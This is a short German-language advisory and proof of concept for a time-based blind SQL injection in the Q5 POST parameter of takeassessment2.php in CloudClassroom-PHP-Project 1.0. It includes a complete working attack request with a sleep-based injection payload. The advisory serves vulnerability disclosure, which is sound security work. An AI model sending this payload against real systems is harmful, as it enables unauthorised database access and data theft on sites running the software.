
Proof-of-Concept für eine zeitbasierte Blind-SQL-Injection-Schwachstelle im Endpunkt takeassessment2.php von CloudClassroom-PHP-Project 1.0, die eine Remote-Ausnutzung mittels einer manipulierten POST-Anfrage demonstriert.
Eine SQL-Injection-Schwachstelle existiert im takeassessment2.php-Endpunkt des CloudClassroom-PHP-Project 1.0, bei dem der POST-Parameter Q5 direkt ohne Bereinigung in SQL-Anweisungen eingebettet wird.
Schwachstellentyp :
SQL Injection
Anbieter des Produkts :
https://github.com/mathurvishal/CloudClassroom-PHP-Project
Betroffene Produktcodebasis :
https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0 - https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0
Betroffene Komponente :
takeassessment2.php, Q5 POST-Parameter, SQL-Abfragelogik
Angriffsvektoren :
Um diese Schwachstelle auszunutzen, sendet ein Angreifer eine bösartige POST-Anfrage an /CloudClassroom-PHP-Project-master/takeassessment2.php mit einer Payload im Q5-Parameter, die eine Zeitverzögerung bei der SQL-Verarbeitung verursacht (blinde zeitbasierte SQLi).
POST-Request:
POST /CloudClassroom-PHP-Project-master/takeassessment2.php?exid=4 HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded
Q1=555&Q2=555&Q3=555&Q4=555&Q5=5550'XOR(555*if(now()=sysdate(),sleep(6),0))XOR'Z&done= Dies verursacht eine 6-sekündige Verzögerung in der Antwort, was die Schwachstelle bestätigt.
Referenz :
https://owasp.org/www-community/attacks/SQL_Injection
Entdecker : saurabh solanki